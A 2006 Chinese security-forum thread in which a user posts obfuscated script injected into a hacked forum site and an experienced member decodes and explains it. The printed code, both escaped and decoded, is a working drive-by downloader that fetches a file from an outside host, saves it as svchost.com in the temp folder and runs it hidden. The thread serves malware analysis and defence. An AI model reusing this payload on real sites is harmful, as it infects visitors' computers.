瑞星卡卡安全论坛技术交流区系统软件 有个论坛,被写入这个恶意代码,谁帮我看一下!

1   1  /  1  页   跳转

有个论坛,被写入这个恶意代码,谁帮我看一下!

收藏
bingbin88880
头像
初生襁褓狮
  • 帖子:13
  • 注册: 2006-05-03
  • 来自:
发表于: 2006-09-29 13:25 | 只看楼主 短消息 资料
字号: 1楼

有个论坛,被写入这个恶意代码,谁帮我看一下!

这个论坛的程序文件被注入这个恶意代码以后,只要进去就跳出病毒警告,IE无法使用,谁帮我看看这个代码是什么意思,代码如下:
var Words="  %3Cscript language%3D%22VBScript%22%3E%0D%0A  on error resume next%0D%0A  z3%3D%22ob%22%0D%0A  z4%3D%22ject%22%0D%0A  str6%3Dz3%26z4%0D%0A  z1%3D%22cla%22%0D%0A  z2%3D%22ssid%22%0D%0A  str7%3Dz1%26z2%0D%0A  c0%3D%22cl%22%0D%0A  c1%3D%22sid%3ABD96C556%2D%22%0D%0A  c2%3D%2265A3%2D11D0%2D983A%2D%22%0D%0A  c3%3D%2200C04FC29E36%22%0D%0A  str8%3Dc0%26c1%26c2%26c3%0D%0A  str9%3Dstr8%0D%0A  Set dfile %3D document%2EcreateElement%28str6%29%0D%0A  dfile%2EsetAttribute str7%2C str9%0D%0A  d1%3D%22Micros%22%0D%0A  d2%3D%22oft%2E%22%0D%0A  d3%3D%22XMLH%22%0D%0A  d4%3D%22TTP%22%0D%0A  str10%3Dd1%26d2%26d3%26d4%0D%0A  str11%3Dstr10%0D%0A  Set http %3D dfile%2ECreateObject%28str11%2C%22%22%29%0D%0A  a1%3D%22Ad%22%0D%0A  a2%3D%22odb%2E%22%0D%0A  a3%3D%22Str%22%0D%0A  a4%3D%22eam%22%0D%0A  str1%3Da1%26a2%26a3%26a4%0D%0A  str5%3Dstr1%0D%0A  set strm %3D dfile%2Ecreateobject%28str5%2C%22%22%29%0D%0A  strm%2Etype %3D 1%0D%0A  http%2EOpen %22GET%22%2C %22http%3A%2F%2Fwww%2Euxiu%2Enet%2Fad%2Fimages%2F1%2Flogin%2Ejpg%22%2C False%0D%0A  http%2ESend%0D%0A  set fso %3D dfile%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29%0D%0A  set temp %3D fso%2EGetSpecialFolder%282%29 %0D%0A  filename%3D fso%2EBuildPath%28temp%2C%22svchost%2Ecom%22%29%0D%0A  strm%2Eopen%0D%0A  strm%2Ewrite http%2EresponseBody%0D%0A  strm%2Esavetofile filename%2C2%0D%0A  strm%2Eclose%0D%0A  b1%3D%22She%22%0D%0A  b2%3D%22ll%2E%22%0D%0A  b3%3D%22Applic%22%0D%0A  b4%3D%22ation%22%0D%0A  str2%3Db1%26b2%26b3%26b4%0D%0A  str3%3Dstr2%0D%0A  set exc %3D dfile%2Ecreateobject%28str3%2C%22%22%29%0D%0A  str4%3D%22open%22%0D%0A  exc%2EShellExecute filename%2C%22%22%2C%22%22%2Cstr4%2C0%0D%0A  %3C%2Fscript%3E%0D%0A%0D%0A";document.write(unescape(Words))
最后编辑2006-09-30 15:14:28
分享到:
gototop
 
endurer
头像
社区嘉宾
  • 帖子:22020
  • 注册: 2003-04-29
  • 来自:pe_xscan Studio
论坛8周年活动礼物
发表于: 2006-09-30 15:22 | 短消息 资料
字号: 2楼

变量Words的值用escape()编码了

用unescape()解码后如下:

<script language="VBScript">
on error resume next
z3="ob"
z4="ject"
str6=z3&z4
z1="cla"
z2="ssid"
str7=z1&z2
c0="cl"
c1="sid:BD96C556-"
c2="65A3-11D0-983A-"
c3="00C04FC29E36"
str8=c0&c1&c2&c3
str9=str8
Set dfile = document.createElement(str6)
dfile.setAttribute str7, str9
d1="Micros"
d2="oft."
d3="XMLH"
d4="TTP"
str10=d1&d2&d3&d4
str11=str10
Set http = dfile.CreateObject(str11,"")
a1="Ad"
a2="odb."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set strm = dfile.createobject(str5,"")
strm.type = 1
http.Open "GET", "hxxp://www.uxiu.net/ad/images/1/login.jpg", False
http.Send
set fso = dfile.createobject("Scripting.FileSystemObject","")
set temp = fso.GetSpecialFolder(2)
filename= fso.BuildPath(temp,"svchost.com")
strm.open
strm.write http.responseBody
strm.savetofile filename,2
strm.close
b1="She"
b2="ll."
b3="Applic"
b4="ation"
str2=b1&b2&b3&b4
str3=str2
set exc = dfile.createobject(str3,"")
str4="open"
exc.ShellExecute filename,"","",str4,0
</script>


其功能为利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 hxxp://www.uxiu.net/ad/images/1/login.jpg,保存为 %temp%svchost.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

这是近期使用得最多的一种网站挂马的方法
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT